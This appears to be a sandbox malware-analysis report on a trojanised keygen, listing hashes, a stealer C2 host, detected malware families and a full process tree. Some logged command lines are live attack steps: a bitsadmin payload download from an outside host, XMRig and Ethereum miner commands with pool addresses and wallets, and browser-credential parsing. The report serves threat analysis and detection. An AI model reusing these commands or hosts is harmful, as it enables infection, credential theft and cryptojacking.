Resubmissions

24-04-2021 06:39

210424-z9rcb7aepa 10

23-04-2021 19:10

210423-eqazybfbwe 10

23-04-2021 19:10

210423-11yc7me6fe 10

23-04-2021 18:20

210423-96m9f6fxjx 10

23-04-2021 13:38

210423-fv1qhsltzj 10

23-04-2021 13:38

210423-6hhapn6pdx 10

23-04-2021 13:38

210423-m5azl6mq1s 10

23-04-2021 13:38

210423-nlvbxenam6 10

23-04-2021 13:38

210423-y4rkc8l6ts 10

23-04-2021 05:23

210423-lejp16ex1n 10

Analysis

  • max time kernel
    133s
  • max time network
    230s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    22-04-2021 19:05

Errors

Reason
Machine shutdown

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 40 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 21 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 8 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1004
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1296
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2768
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2688
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2660
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2460
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2424
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1764
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1344
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1136
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1096
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:932
                      • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                        "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                        1⤵
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:796
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                          2⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:3904
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                            3⤵
                            • Loads dropped DLL
                            • Modifies registry class
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:200
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3040
                          • C:\ProgramData\5522956.exe
                            "C:\ProgramData\5522956.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:784
                          • C:\ProgramData\6455283.exe
                            "C:\ProgramData\6455283.exe"
                            3⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of WriteProcessMemory
                            PID:3460
                            • C:\ProgramData\Windows Host\Windows Host.exe
                              "C:\ProgramData\Windows Host\Windows Host.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:2388
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:1820
                          • C:\Users\Admin\AppData\Local\Temp\is-FA4H3.tmp\Install.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-FA4H3.tmp\Install.tmp" /SL5="$5007E,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:1020
                            • C:\Users\Admin\AppData\Local\Temp\is-PHL3M.tmp\Ultra.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-PHL3M.tmp\Ultra.exe" /S /UID=burnerch1
                              4⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of WriteProcessMemory
                              PID:3568
                              • C:\Program Files\Windows Defender\AECLGBECAK\ultramediaburner.exe
                                "C:\Program Files\Windows Defender\AECLGBECAK\ultramediaburner.exe" /VERYSILENT
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3936
                                • C:\Users\Admin\AppData\Local\Temp\is-OPAM0.tmp\ultramediaburner.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-OPAM0.tmp\ultramediaburner.tmp" /SL5="$30200,281924,62464,C:\Program Files\Windows Defender\AECLGBECAK\ultramediaburner.exe" /VERYSILENT
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of WriteProcessMemory
                                  PID:1420
                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4108
                              • C:\Users\Admin\AppData\Local\Temp\0a-bed20-154-4538d-f0f8ade59d47f\Tukovokeka.exe
                                "C:\Users\Admin\AppData\Local\Temp\0a-bed20-154-4538d-f0f8ade59d47f\Tukovokeka.exe"
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                PID:2224
                              • C:\Users\Admin\AppData\Local\Temp\51-adfe4-5b0-0cfba-b9e6b496b25cf\Latirasose.exe
                                "C:\Users\Admin\AppData\Local\Temp\51-adfe4-5b0-0cfba-b9e6b496b25cf\Latirasose.exe"
                                5⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of WriteProcessMemory
                                PID:2628
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oxdrgqjf.bmv\instEU.exe & exit
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4796
                                  • C:\Users\Admin\AppData\Local\Temp\oxdrgqjf.bmv\instEU.exe
                                    C:\Users\Admin\AppData\Local\Temp\oxdrgqjf.bmv\instEU.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4936
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\12oyarrl.zqu\gpooe.exe & exit
                                  6⤵
                                    PID:5064
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0s2rdlwk.wlu\google-game.exe & exit
                                    6⤵
                                      PID:3568
                                      • C:\Users\Admin\AppData\Local\Temp\0s2rdlwk.wlu\google-game.exe
                                        C:\Users\Admin\AppData\Local\Temp\0s2rdlwk.wlu\google-game.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:1104
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                          8⤵
                                          • Loads dropped DLL
                                          • Modifies registry class
                                          PID:3980
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\enbyy0st.u1a\md1_1eaf.exe & exit
                                      6⤵
                                        PID:5456
                                        • C:\Users\Admin\AppData\Local\Temp\enbyy0st.u1a\md1_1eaf.exe
                                          C:\Users\Admin\AppData\Local\Temp\enbyy0st.u1a\md1_1eaf.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          PID:5592
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fkbvjkb1.lyu\askinstall36.exe & exit
                                        6⤵
                                          PID:5676
                                          • C:\Users\Admin\AppData\Local\Temp\fkbvjkb1.lyu\askinstall36.exe
                                            C:\Users\Admin\AppData\Local\Temp\fkbvjkb1.lyu\askinstall36.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5756
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              8⤵
                                                PID:6004
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  9⤵
                                                  • Kills process with taskkill
                                                  PID:5152
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tjsu2ovd.jk4\FJOIKNXPGG.exe & exit
                                            6⤵
                                              PID:5904
                                              • C:\Users\Admin\AppData\Local\Temp\tjsu2ovd.jk4\FJOIKNXPGG.exe
                                                C:\Users\Admin\AppData\Local\Temp\tjsu2ovd.jk4\FJOIKNXPGG.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4680
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:5748
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                    parse.exe -f json -b firefox
                                                    9⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:4288
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                    parse.exe -f json -b chrome
                                                    9⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:5876
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                    parse.exe -f json -b edge
                                                    9⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:5636
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ruckt4zh.bzk\y1.exe & exit
                                              6⤵
                                                PID:5392
                                                • C:\Users\Admin\AppData\Local\Temp\ruckt4zh.bzk\y1.exe
                                                  C:\Users\Admin\AppData\Local\Temp\ruckt4zh.bzk\y1.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:4312
                                                  • C:\Users\Admin\AppData\Local\Temp\iXjAgNTRix.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\iXjAgNTRix.exe"
                                                    8⤵
                                                    • Executes dropped EXE
                                                    • Modifies system certificate store
                                                    PID:2096
                                                    • C:\Users\Admin\AppData\Roaming\1619125834980.exe
                                                      "C:\Users\Admin\AppData\Roaming\1619125834980.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619125834980.txt"
                                                      9⤵
                                                      • Executes dropped EXE
                                                      PID:2696
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\iXjAgNTRix.exe"
                                                      9⤵
                                                        PID:6104
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping 127.0.0.1 -n 3
                                                          10⤵
                                                          • Runs ping.exe
                                                          PID:3756
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ruckt4zh.bzk\y1.exe"
                                                      8⤵
                                                        PID:5000
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /T 10 /NOBREAK
                                                          9⤵
                                                          • Delays execution with timeout.exe
                                                          PID:4920
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wag12uom.yap\toolspab1.exe & exit
                                                    6⤵
                                                      PID:5820
                                                      • C:\Users\Admin\AppData\Local\Temp\wag12uom.yap\toolspab1.exe
                                                        C:\Users\Admin\AppData\Local\Temp\wag12uom.yap\toolspab1.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:5116
                                                        • C:\Users\Admin\AppData\Local\Temp\wag12uom.yap\toolspab1.exe
                                                          C:\Users\Admin\AppData\Local\Temp\wag12uom.yap\toolspab1.exe
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:5344
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o5uajplc.pgz\SunLabsPlayer.exe /S & exit
                                                      6⤵
                                                        PID:5548
                                                        • C:\Users\Admin\AppData\Local\Temp\o5uajplc.pgz\SunLabsPlayer.exe
                                                          C:\Users\Admin\AppData\Local\Temp\o5uajplc.pgz\SunLabsPlayer.exe /S
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Drops file in Program Files directory
                                                          PID:5076
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:5664
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:4048
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:4676
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:4104
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5672
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4668
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                        8⤵
                                                                        • Checks for any installed AV software in registry
                                                                        PID:5752
                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                        8⤵
                                                                        • Download via BitsAdmin
                                                                        PID:5980
                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pXModaxNw9V0MI8B -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                        8⤵
                                                                          PID:3756
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peQFeVle8bIIZ63j -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          8⤵
                                                                            PID:4776
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:2496
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5328
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5804
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:5264
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:3232
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\rjtzvgWnL\rjtzvgWnL.dll" rjtzvgWnL
                                                                                      8⤵
                                                                                        PID:5332
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\rjtzvgWnL\rjtzvgWnL.dll" rjtzvgWnL
                                                                                          9⤵
                                                                                            PID:2088
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:5740
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:2496
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:5600
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:4676
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp9DC9.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:4932
                                                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                  8⤵
                                                                                                    PID:4756
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ypicqyt.z4k\GcleanerWW.exe /mixone & exit
                                                                                                6⤵
                                                                                                  PID:4180
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jmg4fkvz.klu\inst.exe & exit
                                                                                                  6⤵
                                                                                                    PID:5268
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jmg4fkvz.klu\inst.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jmg4fkvz.klu\inst.exe
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5848
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dnhkogns.efu\c7ae36fa.exe & exit
                                                                                                    6⤵
                                                                                                      PID:3196
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\dnhkogns.efu\c7ae36fa.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\dnhkogns.efu\c7ae36fa.exe
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:5424
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s4gkj2dr.e4h\app.exe /8-2222 & exit
                                                                                                      6⤵
                                                                                                        PID:1716
                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Modifies system certificate store
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4240
                                                                                                • C:\Users\Admin\AppData\Roaming\A32.tmp.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\A32.tmp.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:4704
                                                                                                  • C:\Users\Admin\AppData\Roaming\A32.tmp.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\A32.tmp.exe"
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks processor information in registry
                                                                                                    PID:2712
                                                                                                • C:\Users\Admin\AppData\Roaming\CC3.tmp.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\CC3.tmp.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Adds Run key to start application
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:4804
                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                    -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w4572@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                    4⤵
                                                                                                      PID:4920
                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w32257 --cpu-max-threads-hint 50 -r 9999
                                                                                                      4⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      PID:3840
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                    3⤵
                                                                                                      PID:6044
                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                        ping 127.0.0.1
                                                                                                        4⤵
                                                                                                        • Runs ping.exe
                                                                                                        PID:5156
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks whether UAC is enabled
                                                                                                    PID:5716
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    PID:2140
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4452
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4844
                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                  1⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • Suspicious behavior: EnumeratesProcesses
